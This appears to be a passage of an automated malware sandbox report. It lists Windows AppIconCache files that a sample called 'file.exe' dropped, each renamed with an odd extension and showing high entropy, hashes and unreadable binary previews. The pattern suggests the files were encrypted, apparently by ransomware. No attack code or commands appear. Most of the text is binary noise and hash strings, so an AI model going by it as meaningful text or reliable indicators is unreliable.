                Preview:e~x.E.p...../....x.jd..)..E..h........m...*.D&I\..).........*.9...qE....?..NM.Ra]]..2.) Do..nE.g...p..8f.JoE....[..Z..'.np..9Spk..];Q....Q....T.T..L.zK....Ah/]:{3..UA....}5......ZN.D...V#.K,.................r......(.V........dz../}..U..!xO...+..o.2!.@:h.k..+..&..Q2C#...0.../.|.X...F..UI+b9b...p+v 5..#.r....X.C.c]....{|.S.5g..p..p'..f.'..v.Jt..w.....'NsXF?..."....J..../X..wz.{.....3..8..8.1..+$..P...v...<j.J).|.7..t./.."3.'.3......9..8\.AW%.....M.....C....j...%4#pG.N.Wmc........K...........j.....(.."Z!'Di4..T...u...Ze.....,.%.8T..}........L^..[T=H....h.6.,c....*(...r.21.V.*K.2&.7".wm...c...!..5..... ..T;...0eHk1qc%.LG...-.!m......6/.W..fQI..C.K... ...p/*....2>..!.G..N.......Gd.K.8.A..........Iz.....=s...u..o...b.m...J...U~G".: ....D<.7.|..i..)..U9.../7fz.S..!...U...29R].$R.!.....R6O.g/.I..Y.?.f...~c.*Ih6......^.-.Q..e.H5.r.W=K5!..+..\......AA..'..f...\..i....1.RR.7.O.Q...%q....V.m...a.?.i. .9.......4j..Cka.(7@......t...)....t|o

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4533
                Entropy (8bit):7.962762199243684
                Encrypted:false
                SSDEEP:96:+ll/8PMmYHiIrXHn2YyPU3TkmoDbOn2IBlL/FI2GHezR:CU0FHidPCRDpeo
                MD5:76E4FA93FFFFFFA89F848A8B3B456244
                SHA1:FFC99E30280E86073FD7EB389149C0262D17E23E
                SHA-256:06C94453080CC7273E9EB500426DF0E9647030ED45C0EF24320DC355754DDF38
                SHA-512:63787F3132D904AC26BC75581BCEE5E23C4B2A2BA1787290DA111D10172FA1C065E812A9D45FA998B8AB0C2A45A7CC27980BAA762A833AFB345398EFF16144FE
                Malicious:false
                Preview:..A...&~+..Ah.9..s.....}.}.d..=[.N.QK.....o...o ..y...c.#HnS.z.{......i.1....^Ipw....{...~.]V.0(.0.j.e.....X......J,...A.E.d.3.j..3.S.^h%N.[...z...Z....M..... x..C.X...._.R.,.`3.e...;K...(.F..?.$(m.03*.2Z......'L^...6.x=.....*...\...N...jA.,.?...S<...7..|..g.c! .Cw.....^.0.~(...o.,..:..h......c...?kKS....%..hkP.S...O.....@.?....Lex$..$.:,-.2...BU.>..@=j.j....I_)..[f...o.D.....?O.K.D..{...a.[.I...r)]P._.g<....R.......#..+...U.3.,.ym.&l....{.........H.:..............bx.r.xZ.4......z..{\.p.c.`@....zH`.\E....@.'..\...m30.s...".Ui..k.....uV....w......x1..(w.sF...7C..z..6.e..H.P.}Gk...=-'....%A..N/..A.P..`i..D]....H$)....|.S'.#7w....w..M...@..Ew..31...N..y...s..+.......lh.....O..m9...._...l.z9..Wk.#.h%X...a.D.n..5..~..].B_..L.u.>.f.....v......*..t.J...W..G.e...PBa....o....u.....(BO.E..4..r...q.8.. x(....,.........'..K:.Q..,e.>......Y...)+..."b..1(.t..sEL.d w.M.@.]........G...c..XI"3.:-..f...%.&......G[YW'....O...D?.~.e.mf...V.Z.J.......T..Wl../

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4534
                Entropy (8bit):7.947792891392249
                Encrypted:false
                SSDEEP:96:iJEeQO+CC4/BeoeCN+QkEV4D8nn6HDf6BZ5cHXdyDH2GHezR:uEezeUneCsQNVjnW7635UoHo
                MD5:1A944214DE53C0B202A56D61C0694EBA
                SHA1:79C1B11ABCBC5DC9CFA7A8F79868030DE3713224
                SHA-256:7024C5914A9B1514F9C53F9FB86AF13B7A8A91502A5C6128832DB0F06F3C81A9
                SHA-512:A241597C184EC8D8A05C107723E8A3C1687BC8D30B57F4136203F90494FF427F13DA1041CAEB6A82BCE28E105BB165305153C05E1020207BB4343A3AF2BBA1C2
                Malicious:false
                Preview:.C....3\C.n....b,..Kc=.."......b....iR.[....E..@*..aJ.q...j.M.x.....I.'.l.)ipdp.0.......k.h.2>.`..Y....67.0.{..C...AA.!.h...6JK..b.A.....T:LC'.]t..k!..nk..0.7.;Q~.L....S..w..[L.......T&i.....z.j,.S.....@..H......x.W+d,.dlG..tNt.][K...(U2x....N;t.W...E6Y]8.C....2.}_K).I%Y.7I.k...K&..%...Xj$..b..S.&..5,.T.Y.qE....?.fq...JC."M.+.0N..l....B.7.Zl...|z=...x,...o.._..{..~....e..=}....B.._.._...n..*..D..T.F...5;...!..~m'....Er.^..v.==A..{D...F.aa'.).e....P&...da.?...Z..+|...O.c..fH.&.....)y.xr.&.....tA".5.<,...?........8....X{.F.].=...+>..+W6..dh............P......7Hy-...?p}..U.........O....&....."...Z...m|.9.eY..g..Oq...h.[pv..d.........hLU...8.....B..}.^WZ_.....G.:....P..KrQ.".fD..W.$KP.z.@yY..^_.....oUs.D...~!!'*.ml..M.,.k.....^.u.`.~Nt..p'.+..........Z...Xa...7......w..(&@V....."....k....I.Qt.H.k.....X.........N8.a.........f.=..b.W.V.n.f.8P.Y..[.)...8...PS.......y.i.W.T..c.........6.rg.0.w..O....6.......g,...qR].!=..Wc"N3JD8.e..CF}...4..S..\.......I

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4526
                Entropy (8bit):7.959273683968016
                Encrypted:false
                SSDEEP:96:m0eoTrEjxE+ekYM4HRDp7dC2kyLYUNfhA3zkUytzru2m+Uj/Ov2GHezR:FeoMjxEtkYM+p42dYDIUyTmhrOvo
                MD5:9C84628BC3A5E07D73DDFA3F9BB03491
                SHA1:731B4EEC536AA14B45A2A9204EEB48F20E87DC6C
                SHA-256:C9A6F551EA8ED069EFD3BBB9C8392E28A59AFBCBA2C9BCF37A1E75195C918020
                SHA-512:6A265FEDA8950F99C30A985559A57172782DA62C8A6B1F4218EA789B321C559BBB416C750173DEEBA9A18A4DC17F30DCBA982E1B2D0AB09904541BB313D79EC0
                Malicious:false
                Preview:.....9..X.Y...b...M..<.5..{...)......1..^~@]SpP....!..x."....f.%..-CU...E..g.*..^5...= .8.*..}\.AB.5ri....].a..H%....*>.$...?bv....-.JR..0..T...}.17.......|.._...?...7C5..._.l..c........K.A@.....h_..i.....g.)X......_.......B..I..1..E...k}..........I..P....#m.a...(.....5@_....[......g..K.........q..`Z..&e.j..........MZ..&.U..d...Y".4..&...8....2=..K.9...v........hr...{z.j.|..o2w.e.M.d.;.....=.....IL...H.|+L.........V.0._W..D..l...V..j.x&0./."....._.?.,....m....$.^...0..y>....l..=).........#...M...$Vf..-c.k:F...y.Q~.|..BK.c]..Z..'...;.p...z{.b....v........M.6..w...7.vK.{!'...;.n...rw.2..zT.v..X.Z..}`..o.fH.e..3[...Ej;...........Uq.\...1..q#L..HO.......A.-.s8....v\.d!.r.....T...#%.)c.....6..(i.?. `e.......Hw.&S|m....v#..}.{..:I<.........y....._.?........85.rH5...Y3.E{..p.F.zZ.......;.P/....#.....^>....f.......a^..v.......+b....D.J.V..0......o..K....y....U.Q.q.o.=.-.F....x.8...1m&fj.Z?.W..Fq.k..G..;.>......Oa.A1SE......u...,.n...'....)...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4544
                Entropy (8bit):7.959320418010197
                Encrypted:false
                SSDEEP:96:PlroTfeTdcVA//rLUtV7A/dg88Hexcl7n2WzSw6IyF2GHezR:JQE3f87A/dQeep6ho
                MD5:D65ADB00E29E5D2E8737397F1FEDDBD4
                SHA1:AAA601933F821461935D37CC2488C8E7F7835CCD
                SHA-256:CDBDD5CE76E9CFF089C21712D53990272EC99C23051E607519B0E94D9B5DD397
                SHA-512:85B61ECF7A5719D2C0963FB0D38A6225496D0D9917B003DCE989BCC7620489FC697E4F2C90834183E0039F9FF7175339AC989C09B90D49DFCCD3A8C91C19931A
                Malicious:false
                Preview:nwJ.1.ZD.\..%.|#..z...P....'.W..e.#H.....Q...Y...e6%......".m..l.`.=MN...CD...M(.w...d.T.....B.>1.A4].....*.82.....OK...S.oh..-.fe...{..$9H;0..5.p>.>..?...(Ta...COO....zf......[....~.>.......q.B.fa......J.q........X..G.h8..s.^...6.K.J'...I.%_..T.0:....|.....wx...it.i......C...rgpk.F...D...z.>........^.)q.@.hp..%....Ii....A.m..F.......9.'.[.T.o..G..8./&.`.r99....6..$V.....?....%...@..m.;mAr.....1.....SU..#.&.g_...*.q.#.T.t..*H.D.=...r..Q.E....A`..6[.U..].FkH.D..i`..Q.o...|...:..2.#K;.+....jw3yJ.._...|Ss...O..{.5..2..j..f.....T..g..i.....}.m.oH{k.!n..R.b:jh..7Kp..p....K.Y....`.....a...XG^k.....:.....uX\o.1.3...Q.'..|C.R...SH..v.6.f......R.....h.H.........H.4.1R.m.;"....f.:......p.A+.kh.nC...7...(}.^6y~IV).^.......W....)f.d..}...I].r.K...6....9q,......o!_...u4.\.....TY.p.....l.qRC..-..LO..v.yd....1..`.....$....j..H.M;..u.$k.c2k..~.+.B5....,..qB....}..Z.\5r.-e.K.6..@8.Ca...?..d.......r.....q...|C.qw.{<...?.~|..Z.....7D....tu..%.G.-.?9...c..+d

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4526
                Entropy (8bit):7.957818861590098
                Encrypted:false
                SSDEEP:96:mGxWllAqAZGuwTepEjHw0LODtdRlcEgG6VAWa+y0tx2GHezR:mGgluqAZGuo3cGOHRlDzWAWq0Ho
                MD5:D2E993BE252D98896A65945DECDCB456
                SHA1:C12BD8488C9AD2CF2312351AB5B853C9E3EA60F0
                SHA-256:BD3864B5C570ECCE6053421125B73BEF8D741759A85385DF591C225F57ABE445
                SHA-512:BD714DB510D7E8F8DEB04F4885EC752161238D05E427FCEA6CC84329AF7D0B38B965EC690AFCD49759C413AF0FE04AE126D509102695C2E4C74FC1B3650EEFAA
                Malicious:false
                Preview:q2....m...............[..k..p.8...$...N...s..l.Lx...8..]..l..@C..H...l.j.O..4x.r:ut.Q.:.....x..Zx.8Y.Qv ...@*...j..<..F..C.R....*.vC8..Y.c....A.....e.s...6...]8a<.I3.r...v..)..m.......(`D.......G...]...P.SrEWE..N..l...a..g1...h0(.........c...3R..>a\<w?...JZ......l...k...Q.i.t../.....1.E..F... y.j.Q._.uX.X..tEK...<...."..?.....U.o..0"..J......i.M]....)..Y... .0.X.IH.W]..F...r'.5 ..."..'|.i..B.k...f].,..L....V...|......A...'oO.t.....(...I".F.~.t.:.%iv..."u..U.F..k.x7...ZMR.m6.dZ.:.e..%<......TX80._...;5..ifQ..E..p.kW.c<...\.1N....2ER..B....$........Vm(..].Z@..hD.fc...gS:.vx..#;...+G..U..C..21.TL......o.8.]q..\...i.W.B.M..P3...bh..C...D.&:......B.aL..O...#53.G......\r..y1..u...}..bE.6..tx..8.......CV.~P..;k.K.......S.....&E.&.f..d.. ......e...=.PZ.6.$J...+.*h&yvl....)g4_.v..v{.S.....A.u_I.M..Z..h..%............<.jX....?R.'TkugP...}.. P......4.2#..s^.....]..|..i.J...8(.2..9........p..|....qEk...\;..;.cc..K...VwmU...s...!...CtS.iK...j.ob..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4539
                Entropy (8bit):7.958162852547455
                Encrypted:false
                SSDEEP:96:oRqC5t5V5aAs/vW/E+BRvwOxjniGCxHLRB4UHuSuEaDw4z1hfLN2GHezR:oR55t35wvW/E+BZHiGM4U5baDx13o
                MD5:64CAF0A7787B6922DDF336734DDB4389
                SHA1:D4B03DB5D0CDDC9404A30AD273B9001D4B0C746A
                SHA-256:6F3D21B2DED4EE5C0D4A05CF382A09774DFB204484192321AE9EDA7B9EA8174A
                SHA-512:F6B274788CC84C5D55D680A5056B633E58C59F922CD015D30B81E672A2BF7A1CACE94F1B7BE6E4629AB7CB0CE0E4C8F42C9DB078775CC6C8FC45D98B100A8B1F
                Malicious:false
                Preview:..R.x.x........I.E.Yv.m....*.B...p.-.V.>:y]....g.......G.Is.7...D.*A.O..T|i.A..w..7w.h$.V..zWdA...I.?....%^.P.:..o..`.%..2K.eo..q]&.JQ.,...f.Q....#.s.,.).dE...g..sO.{..F.}..y.......5[....o..R.6Q..`.vl|SSd.......*.;....s.R}x9...5.luix..t..a.....<.J.D..xy.......0+.<..B.b..N.%#!.S.Rc..@......(..Z..u.......'%.....8z.g.d..dJ..G..]X.%b*..QIP..G._.m.)..*z.g.\U`...1...*..>..X.v.Q.q........;.. {{.r.u^.=..W ;l.Zs..ny.U.O......%....5.......<;...a;.].H....P4sb'..NMf.o.<]....T2.e...v<....l..8......p.6..z.(....bez..!0.&......J.[....YM.E0d.h{.~.....H.ZyV.z.c..Q.TkGj.u..e.......T5..j.e..K..p..{.._.....cW..l.!O4O.u.`J.......fk.....D.B|.x..(..A.0....0)'...%.k.. .0....x.... ......RO.rS.es.U5Q...|..=...O*`W..;.....B....v&{.{...8?~/z....0..:.".O*..lb..4...K\..CC.2...$...'....6zA.+.q.W8....R.....x......d.P.I.V.-Mw...q.wBx)...YF:..?..4.)<._.@......co...M.p.U;..gp.!!~..X.Eb9..psu...q...#r.e20...."]...'...7.....rf~t..d... $..8@.oYsg.^.i.\?..]...b1...v.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4533
                Entropy (8bit):7.96284081617023
                Encrypted:false
                SSDEEP:96:k8gULrBHJlm9L+x631XKJvRlml013xDFBJQgLSWAQuOQVii2dhAqtQIS2GHezR:k8gUxJ89XXKJvD40VZdQ0SWAQcUhAqtF
                MD5:D4CC4BB5AE5134CAE10CECAB74633A24
                SHA1:4E19C15D2C72E61BC316503B94EB4AE02577C6F6
                SHA-256:1556A2065AC8038073C4616B963EA89C7845C788D08A337C2B914F35825A0CCB
                SHA-512:81742674D9C16104EA07CD79AD189A1D83BC237256D1670A15BAA98AAD860AD2926972BC1F69A68F21A7A3E654A8437D7A4B675E3E6ECAF16A443CE2E15916B1
                Malicious:false
                Preview:TT.@S.....JT.,.=B.,...3....?....,..hN.J=>......X.9Q..\.5'@..s.a.z.+A.;...wX+...MD;.._....P\.R.L6...YQu.L....*K...a.......gV..'j...4..f..d3..'.7.Do.eH.!h..P..\..0...o..x.l.... M..HW.%6....NVD.&s.#f.....-P#z_"<.?.j3i..[.\.N.kE.PZ.*.w2....es.y...#..}..|-....s.....#.........(...f...53#."RC..O...u...AE.C.v.2.M. w.......Xu2..}F....A.. ..J[.k.O......E.$T%....#.O]...q..W.....P....0F-W.......D./..Wf....+...Q)...}..e.f.....J.&[T-{.....g...R.@W'.....4.....x....d.:..Z].... ...G...pm.6o..0.......... .$.).!.Al....!b..Q.`.".W{<V%....V.....Ku.uas.?..6..d......Q.5...aUa...7..d.!..mA.npr......C.<...Zh/u..FM.'..(a.<G.......d..E..........-!#/.L...i..Gm.n"..M.9...CA....:6...g....8.U....mC......... ..^o.N.....G?...@{........B......V...Cd.c.......E....3+....f..\:.....1....`U..{.....>.V.....P!G.a .....koMV.1..#h.p.<....fK.g4!v.......`.ql...d.......{v...(...y..7.;b=.P...oj._....*t...f..A;......x$...\_.,;..~$.X...r...c=.|.$j..ow..^...O.......x..{.W.=9Y*.~...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4574
                Entropy (8bit):7.960151404403628
                Encrypted:false
                SSDEEP:96:5uk0O7cuOMOtI7PQ+p/0ChaY6YuWey/YbeEmDYu52GHezR:ddcrI7xpsqp6lpyaef5o
                MD5:D727FD3346B04C45273A13E54EB10558
                SHA1:0438D50188AFB685475A7E6C8C2062DA367B6EBF
                SHA-256:93CD420705B5BC89CCC27A0BB9325586CDFBBDA5F314A1924B3BD665B67DD519
                SHA-512:857FF8A328B3F2DB4C18105EAC982F32801304B8EF84D0B0E7C87BED21DA372CAB8091504768A8DE99B94F4CCABE231A0986EB724402E6EA06C36B58335573BE
                Malicious:false
                Preview:..}.l..2...q'.@N....g.B....l...*......R.G6..-.g..\.i..C>`.......(.[XJ....eb8?..v....h..w....'..EtTrL4... .....0.......BY.#.?..+6...{2........n..?.N......cq...$7..F.q..bF.A...:...M`..P..0n.YT...m..._.M.'Ae..t...e.]..j.M.....A-....F.\>.j@s.........s.k..I.I..x..L.?.q..vd|Q&1t..@......./..].00.y1....\..Y.."...S.A]!.K.Gn...Bs.c3...p...b...,.r.,j.....=qU2...x.......J.=..o."...%.R9Bb.#>Q.....V.....{Y./....^N..#.O{)!..0...l.8F..k.../.D.....J../.:N..!.zt..X...\Z.2..h.....2....e...E..g).AE.......8Y`...H...9.*..Y.....cQ...<&.Q.......(^d.....IA.....A.....Hmr...N..c....1...0N..b.l.|......uQ.J.v...y....E[.w.*z..O5.....w...yN.....Cb....vQ..E..GP.....{..$....o..N.+`.*,.\+ ......h..-]!x).CHt..Dv.^(B..~F..?[.@.......0.{I..../...Kgf.GZ..f.Q.d\r.5.....iWx8.Mk.H0.....s.&.\.vj....<.....g..:..t.P..$Zx..........k..o.S.!........lk..%......}5-.>.....0.F..<.....y.x.i8h.d..w;....e..N...G.m.;y.z...,...F....uA...Gz..F..@T.}.........7.(.D....il...ohY.....T.0.k...

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4564
                Entropy (8bit):7.962112003177555
                Encrypted:false
                SSDEEP:96:X9WooYm64sFQ2wy4rxb3KZH0MISD9sCMUwUMkBWN5blkWyANeFCcKdpN5GF82GHa:X9WB6hV4JKd0MPsC7LrWNfxNYCcm5GFV
                MD5:523320E62F7517DBEF7CD0B9BE58C2DA
                SHA1:CB10A7EF7DB554700CED28D733C57697D6E64860
                SHA-256:DE09B114C9893BB92B78E7A95BF656ACE346A4ACA18F509C23873D984B9AE20B
                SHA-512:F74D8FAC173AF8085CC31C8E0B4C8EDF499AF27408CEDC2E0B82DF6776DA73C6C4A6F2C1877E8DC99B19F2BC6B6F1EED3AAF7DE9CD70475C28F90DF8DB5AEA06
                Malicious:false
                Preview:=...>....."......nG.b....u\.K.=.j+....COc........8%.{.^.>.............olI.......}......V..7.`..B.....D.uL&.x.*....y.!..y;....7....J]=m&a[.[c.d.)+....q8.#..../..M.........#....lr..FH....^...5.hY......f......r.s.[.Z......%..v}7D...^..Xx.$F...C,c...z.R..~...6X.......'.F.}"9i.N.<......XN9..kYSw.B.....X.}.....y.../.7...%.".L^......99.:...{.kK.....jE...A..H..+kW"..,K%A...6.[?.9..{%>..Qa))....#...zM..Psy...^....k.q:.V...2........U8.r.`.H3.V....,.8b.?.{\...kw4.....n.Ml.h.@....p.....7<...TG......9....~,..M..9.H"...J.y....\.|.J.7S.oxe.I.7o.n\.I3.x7.,..ISR.[...#.\%...$f.m7h.2....."..5....bg......S6.#'....C}.U....%dqA.a...g..Y>.....1....'...O..^.. ....A8O..W.|7S.9#..H.......7.J&Q...l.ebQ.L.q.O...5...x8.i....L..n.".f.-.qiA.D...4.%...Y...t=1.-P.=..pk..y..h.?.....---j<.:.&..%w+P9.W&.......+VI]...A.bf.g.7'...8T......r%......tE....h.2v.....#.*.;#.L.[G...>..;}.L...ny......z..Q.3....e...T..D....X.Zf..).DU..Z...:q....[..W..d............ gC.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_Adobe_Acrobat Reader DC_Reader_AcroRd32_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4566
                Entropy (8bit):7.95390014331642
                Encrypted:false
                SSDEEP:96:/OM2rbdYbdKOFX3KiKYMx1Qd5atAnKlYOJ0qRmiYBfR2GHezR:/n2rabYOFXaiKNbc59n7WbsiKRo
                MD5:2CEC51BF2E7A731AA308EB856969DEB3
                SHA1:F2FDEA4564E4C5903A00B705CD7F9BDF65138EBF
                SHA-256:760C0BA11773C85AC5E6043F1A7130BA7D0CD453CD51850C41CEE498C056C9C2
                SHA-512:745C0A8919440A3D86B6B1988E4B94671D76215EE59CD99E0DC855C47C633E6994A465C486EB71EEE5CF87F966E47A0B98D730C793E9545E5E48C1460C5F54BF
                Malicious:false
                Preview:O..R.3.f..:.....}`...^...H.x.v.LIX.we%....p..@3......D..]...N.......*H........Z.7r.N1u......1<..X.m_...fH..L-+u...X.)}.C..W`.WOW-.H).B............6A..J.U....o..7U..h{6Z.C.)h.....g.CG.. .$QM.@R.."Z..Ppo..F.U..a`...M.{.6.....n........0..vH.9.~.rA.7+..o/.FMd.B...B....8..+...Y.,.P`.Vo.......NLm!8...E....<..0.!.@.9d..>.....1..3x.$e.U.^.9...&.X^..i.Gjc.v.....0.....\:0....,.M.^.#.g.....D..wi..:Ma......d.$MM.6,..;...X..B.P@2....b&f.gx9gv..0...e....kS..Xc.z$..}*!.X.....%s_$...D.R.$r.9..Ag..B..m..f..[.q.M<...qZ.p.q]....~.).l.....^...|.o.0..eG>....U^T.EW..k...........{.........K.7.CL.+.....z.A5T......H5.u...K.....4....Xc8G.....}.F.&.....2v...p.M..(q..6..`....8.....F|.......p .bQ..4.sa.z.w~..`t... U..M..P.{.(......,......r.6.N<........K..3.e.(9.._..`o...$...:`...3.yP.......1Jy.1.f.......Xk.mL.B.x.uC`.A...5...;.M.;3z.". ..../..&J.N..IJ.Q.vq..M.....u.6x..L..n.}+..k..k.{....`e..I/...?r....z..~...!O......../..E..w.M].!a...F..Fk^=v....K.w..Q.;..4*

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4544
                Entropy (8bit):7.958761440061069
                Encrypted:false
                SSDEEP:96:fQKl2kjkP6tlCenJU+DCWVx9DHu3s8csnZj3zxShER02GHezR:fm1PeBnNDfbHGNZ3xS2yo
                MD5:FF4A0092A89E77203BFFE0CDC8858CDA
                SHA1:4BD90DEE1610D01AF2E028624880EC8332EBCBCC
                SHA-256:8DD9A75978A68867E7B2A224A4409F56DD2F8A920CAEC2B3F09FEB8648713E3A
                SHA-512:B6B684913EC84BFAE1F4D7F407D86EC1F71C2E677DB3F45F9241F679241F8F75CA91F0C317D397AF3B3BC4BD57015C3067B698360F9F6A88F4586004770DC174
                Malicious:false
                Preview:f....s.p.,..S.s.4t.W......7f...]oNBt.O...{?.g~*..K..>..Y...;3..C..T.._.hX.uF%....U.r..v..[B..A...b\v^U......c8?4.....k...'Z.z........1{...Cc.e..Eh...[....J|x4@..d.....3n.R.|.l.37.`7^s_...)......'...YAB.............B.N_.M.C..N..L]@...B..e.e...P...C...m....Uz.IE.n.........t5.......FRE..#ye.....'.O..;...Z.N...S.=...........%*.d.!Q..a...._.6,.d..U.Ve0. =..A..wf}.<X...BL.Ou..s.....[.............X...,......A& @...j.....>..|.?..=.9o)....h...I....7.....0.....Jz.3!t.7.mN.r.........T(........Eb.A..........9.)d.jn.e..A.....U..G,..v[...h~.l."C,.l(...........-.J|B.M@......M../.&..h...'......&7m41.2.6.&..Z.,....;H..r).d7V..$s@.Z......O...v...=.........[..j..f...@!.+....]8.9....).8i.J...c.0V].c..:./,..f.T.....Y?..T4r?c...~...G..|..-...n=.....E.%...2....!...[....x......L.......... .P\.S.x.Jsg...yA..9.6KJm.6..M....77..:...6.?.Gg....KQ.4M.}. ..[y$I.51b.z1l..p..S[.cN.js.\..s.{d*...........-.<J&..S........i..........N@...J..x."J.F...SY..........,..ma.....

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4550
                Entropy (8bit):7.957412317441495
                Encrypted:false
                SSDEEP:96:EPuyT55mY4qW7CL7Own2te3pRLlHG82GHezR:EP1rmY4X87p2te3pJXo
                MD5:5C79CFF6F84D3751E29D91A839C59400
                SHA1:F9E60D7A74054CD84E2DF57CF018CF65DB2C1F3D
                SHA-256:9E130AF1B2E97A13536309A725F80783922B68CF9E019BABCF03F177E3B399CE
                SHA-512:5A656B8E3708C7E53C6AC87DE28002B11AD3147D08FF7324ED9B0BFD33412204F2529F1A639938CD3EDDF27D61270197F2073C35C0BA031D3C4DFA09743A88A8
                Malicious:false
                Preview:....H.a....7c.9....3.....|..s.....c..W%...#d\.\.... T.3.g.....h....u%..3V.^..m.7~.fQ..(wC.,.,M.D...Q.J...)p..(.w.1F.K..e2.....].*P,7^.....yl.......l...m?..$..C.......}p4..........'...9*.....IK.~.>.......VO.Z...z..N.M.>.6i..s...f.o...$..o.].@...seg.......?...f#......E.6M.....Q...j..:....?7....<'.j.a..*Mr.j...=|.6..1.b`.O.p......Z>.....A....x9.4.....~*.......9..;...@.....5}y.}.....%0.y..M;T...e.........d.Y].g.`...S...Z.......e.&.....&s..C..N.8..qt...F.....e/C3.=.~..-r.v..6..]$[\_...i..H....;..%."T.4"-Ad......ud.:...+8......]Z).F..........6!xe..)...$..u.@.b.Z.=.<....c.t.S..&.f J.3M..G...0 .l.5...*...t...s..X..+I..*^.vg.....3..,.}..;...Q+.......9...+f.;.z.c,0...y....?.o...&.y<...c.......X...6.0...X....|...=..-|..*...........L......Zde...F....\?..}I.6W..Y.........HgA+........'t#.\.p...h....(..H7....I..0S...].Q.....x....j#....p..8.h6..5.W9...'...r.@.5..y......h]...E...SKW3..U....q......K...R. .2....I.X..g....#..3.X^FP.=E.OJ.m3l..e.U..a..>..

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4543
                Entropy (8bit):7.957920632998373
                Encrypted:false
                SSDEEP:96:yna6vaK0uyaF8mn8nrKjASqNfSjU23jrl6e6YbD37hdFwngtA+7HNSR62GHezR:Ma623e8murQASqNOF3jr5hPtdYonRo
                MD5:75503765DED106D1E3369A18444D88FF
                SHA1:0584B51ECE6840E528C4A33B9431EF67E16CEFE6
                SHA-256:3D4E3263F8F040B2ED2F64365B980F7A35CDA735CF603D85C3167945B1328B8D
                SHA-512:B147A48A1F6219AF98AAF0655EFA8C3B023E0248359F108D54B1044E6826ED0D1340705188314A09EC4A1F8E0C580908ADFF1A8CDE40D5AABBA7FCD65015430D
                Malicious:false
